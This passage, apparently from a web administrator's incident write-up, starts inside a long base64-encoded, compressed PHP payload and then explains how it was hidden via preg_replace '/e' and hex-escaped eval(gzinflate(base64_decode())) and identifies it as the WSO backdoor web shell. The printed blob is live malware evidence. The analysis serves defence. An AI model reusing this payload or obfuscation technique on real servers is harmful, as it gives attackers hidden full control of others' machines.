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'\x29\x29\x20\x29\x20\x3b",".");
The hacker did not use
eval(), which is too vulnerable to grep and other tools, he used the special constructpreg_replace('/.../e', ...), which still evaluates some PHP code generated dynamically, but using levels of obfuscation that may be hard to notice by the programmers. The following argument starts with:\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28Ah yes, another interesting feature of the PHP language is that, for literal strings escaped using double-quotes, it converts characters escaped to hexadecimal to regular ASCII characters. This feature is being used here to further cloak the malicious code, and the escaped characters above are decoded to the evil:
eval ( gzinflate ( base64_decode (The end of the argument is the closing par of the function calls:
\x29\x29\x20\x29\x20\x3bor)) ) ;The data in between is simply the base64-encoded code to run at each invocation of the script. Reverse-engineering this data revealed that this code is a backdoor named WSO which seems to be popular in the hacker community. The tool appeared to be extremely powerful and give to the hacker complete control over the machine. It even included a password protection feature so that the hacker could be the only one to use it to compromise the machine. I removed it from the server to stop the issue.
For now, the attacks have stopped, but it is still unclear how this file was put on the server at first. As usual, outdated extensions are probably the reason. The server was hosting mostly Joomla! websites, and some WordPress blogs, but the tool was simply used to compromise every website via .htaccess.
Security can never be perfect but improved each day, and this article should hopefully remind you how important it is to stay up to date, and control server logs from time to time to detect abnormal activities.